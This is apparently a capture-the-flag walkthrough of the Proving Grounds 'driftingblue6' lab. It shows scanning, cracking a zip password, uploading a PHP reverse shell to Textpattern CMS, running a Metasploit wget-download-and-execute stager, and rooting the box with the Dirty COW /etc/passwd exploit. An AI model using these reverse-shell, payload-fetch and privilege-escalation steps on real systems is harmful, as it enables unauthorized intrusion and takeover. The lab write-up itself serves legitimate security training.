photo of iceberg

Proving Grounds: driftingblue6 Walkthrough

, ,

Machine Stats




I started by running my standard nmap scan.

└─$ nmap -A -T4 -p-
Starting Nmap 7.92 ( ) at 2022-08-30 21:56 EDT
Nmap scan report for
Host is up (0.092s latency).
Not shown: 65534 closed tcp ports (conn-refused)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 71.93 seconds

From this, I see we have a robots.txt entry. With only one entry, I figured it was worth a look.

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute

Here’s what the site at looks like.

Now let’s take a look and see what we can see at /textpattern/textpattern

It looks like the Textpattern CMS.

I now ran a feroxbuster scan to try to enumerate some directories of interest.

└─$ feroxbuster --url                                                            

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.0
 🎯  Target Url            β”‚
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.0
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          β”‚ [GET]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
200      GET       76l       75w      750c
200      GET      212l     1206w    53656c
200      GET       76l       75w      750c
200      GET        5l       14w      110c
301      GET        9l       28w      324c =>
301      GET        9l       28w      331c =>
301      GET        9l       28w      331c =>
301      GET        9l       28w      330c =>
200      GET      130l      860w     6311c
403      GET       10l       30w      296c
301      GET        9l       28w      336c =>
301      GET        9l       28w      328c =>
301      GET        9l       28w      344c =>
301      GET        9l       28w      340c =>
301      GET        9l       28w      341c =>
301      GET        9l       28w      343c =>
301      GET        9l       28w      342c =>
301      GET        9l       28w      340c =>
301      GET        9l       28w      349c =>
301      GET        9l       28w      344c =>
301      GET        9l       28w      347c =>
301      GET        9l       28w      347c =>
301      GET        9l       28w      351c =>
200      GET       10l       14w      145c
301      GET        9l       28w      344c =>
301      GET        9l       28w      344c =>
200      GET      278l     2491w    15170c
200      GET     2718l     7151w    82294c

It looks like there may be some exposure of the various directories that contain the innards of this CRM. In order to fingerprint the CMS version to start looking for vulnerabilities to exploit, I browsed to the /textpattern/textpattern/setup/themes/four-point-eight/manifest.json url, where the site’s theme files notes the site version.

At this point I attempted to use several sqli login bypass attempts to get into the admin interface for this textpattern instance and was unsuccessful. Next, I decided to get back to the /robots.txt hint and start enumerating for accessible .zip files.

└─$ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .zip,.php,.txt                                             
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip,php,txt
[+] Timeout:                 10s
2022/08/30 22:15:14 Starting gobuster in directory enumeration mode
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]  
/robots.txt           (Status: 200) [Size: 110]  
/          (Status: 200) [Size: 179]  
/spammer              (Status: 200) [Size: 179]

Well, this is already looking more interesting. The zip file appears to be encrypted…

└─$ unzip
[] creds.txt password: 
   skipping: creds.txt               incorrect password

So let’s crack that.

└─$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt  

PASSWORD FOUND!!!!: pw == myspace4

And now we have credentials!

└─$ unzip                                              
[] creds.txt password: 
 extracting: creds.txt

└─$ cat creds.txt 

Now we are able to login to the Textpattern CMS.

I discovered a very useful and thorough diagnostics page that dumped a lot of information about the system at /textpattern/textpattern/index.php?event=diag – among other things this confirms the version number that we are running. (enumerated earlier)

Textpattern version: 4.8.3 (596bca03a4b32004412499363cecec62)
Last update: 2020-09-13 19:56:06
Site URL:
Admin URL:
Document root: /var/www
$path_to_site: /var/www/textpattern
Textpattern path: /var/www/textpattern/textpattern
Article URL pattern: messy
Production status: testing
Temporary directory path: /tmp
PHP version: 5.5.38-1~dotdeb+7.1
GD Graphics Library: Unavailable
Server timezone: UTC
Server local time: 2022-08-31 02:13:12
Daylight Saving Time enabled?: 0
Automatically adjust Daylight Saving Time setting?: 1
Time zone (GMT offset in seconds): Asia/Baghdad (10800)
MySQL: 5.5.47-0+deb7u1 ((Debian)) 
Database server time: 2022-08-30 21:13:12
Database server time offset: 0 s
Database server timezone: SYSTEM
Database session timezone: SYSTEM
Locale: C
Site / Admin language: en / en
Web server: Apache/2.2.22 (Debian)
Apache version: Apache/2.2.22 (Debian)
PHP server API: apache2handler
RFC 2616 headers: 
Server OS: Linux 3.2.0-4-amd64
Admin-side theme: hive 4.8.3

At this point, I decided to take a look at ExploitDB and located TextPattern CMS 4.8.3 – Remote Code Execution (Authenticated) however I could not get this to work properly.

└─$ python3 mayer lionheart

Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino

[*] Authenticating to the target as 'mayer'
Traceback (most recent call last):
  File "/home/xxx/Downloads/", line 122, in <module>
    "_txp_token" : (None, uploadToken), # Token here
NameError: name 'uploadToken' is not defined

So now, I will just try to see if I can find a place to upload a simple PHP reverse shell. I typically just use Pentest Monkey’s php-reverse-shell. I found what I was looking for at /textpattern/textpattern/index.php?event=file

The file upload was successful. I started up a listener with nc.

└─$ nc -nvlp 1337        
listening on [any] 1337 ...

Now, how to locate where this file is. I recalled in my earlier feroxbuster enumeration uncovering a /files directory.

301      GET        9l       28w      331c =>
301      GET        9l       28w      331c =>
301      GET        9l       28w      330c =>

So going to /textpattern/files…

I clicked the file in the browser, and the shell calls home!

└─$ nc -nvlp 1337        
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 33403
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
 21:35:49 up 58 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami

Now, I want to hand this reverse shell to Metasploit so I can play with exploit/multi/script/web_delivery


msf6 > use exploit/multi/script/web_delivery

msf6 exploit(multi/script/web_delivery) > set lhost tun0

# after using show targets, I set target to 7 (linux) because the victim machine is a Linux box
msf6 exploit(multi/script/web_delivery) > set target 7

msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/script/web_delivery) > run
[*] Started reverse TCP handler on 
[*] Using URL:
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Y7eZ2p7O --no-check-certificate; chmod +x Y7eZ2p7O; ./Y7eZ2p7O& disown

I switched to the basic nc listener I had and ran the wget command specified by metasploit.

[*]  web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3020772 bytes) to
[*] Meterpreter session 1 opened ( -> at 2022-08-30 22:59:58 -0400

And now we have a meterpreter session.

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions

  Id  Name  Type                   Information                 Connection
  --  ----  ----                   -----------                 ----------
  1         meterpreter x64/linux  www-data @ -> (

Privilege Escalation & Root Flag

I now upload linpeas

meterpreter > upload /var/www/html/
[*] uploading  : /var/www/html/ ->
[*] Uploaded -1.00 B of 757.53 KiB (0.0%): /var/www/html/ ->
[*] uploaded   : /var/www/html/ ->

Linpeas primarily seemed to return the Linux kernel version as an issue.

OS: Linux version 3.2.0-4-amd64 ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.78-1

As a bonus, I also found database credentials at /var/www/textpattern/textpattern/config.php

cat config.php
$txpcfg['db'] = 'textpattern_db';
$txpcfg['user'] = 'drifter';
$txpcfg['pass'] = 'imjustdrifting31';
$txpcfg['host'] = 'localhost';
$txpcfg['table_prefix'] = '';
$txpcfg['txpath'] = '/var/www/textpattern/textpattern';
$txpcfg['dbcharset'] = 'utf8mb4';
// For more customization options, please consult config-dist.php file.

I also decided to run post/multi/recon/local_exploit_suggester, but neither of the two specified exploits worked for various reasons.

meterpreter > run post/multi/recon/local_exploit_suggester 

[*] - Collecting local exploits for x64/linux...
[*] - 168 exploit checks are being tried...
[+] - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] - Valid modules for session 1:

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.

Going back to what linpeas found… because Linux is 3.2.0, I started to suspect this might be a machine vulnerable against our old friend dirtycow. I previously used and decided to use again the Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)

meterpreter > upload /home/xxx/Downloads/40839.c /tmp
[*] uploading  : /home/xxx/Downloads/40839.c -> /tmp
[*] uploaded   : /home/xxx/Downloads/40839.c -> /tmp/40839.c

meterpreter > shell
Process 5244 created.
Channel 143 created.

gcc -pthread 40839.c -o dirty -lcrypt

Please enter the new password: 1234
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f0fdedd6000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f0fdedd6000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'coolbreeze'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

We can see that the new user was indeed created sucessfully.

cat /etc/passwd

When I try to switch user (su) I got an error.

su firefart
su: must be run from a terminal

Ah right, this is because I need to spawn a tty session. Because I remembered we have python on here, I just did this:

python -c 'import pty;pty.spawn("/bin/bash")'

And now we have success! (and root)

su firefart
Password: coolbreeze

firefart@driftingblues:/tmp# cat /root/proof.txt
cat /root/proof.txt
Scroll to Top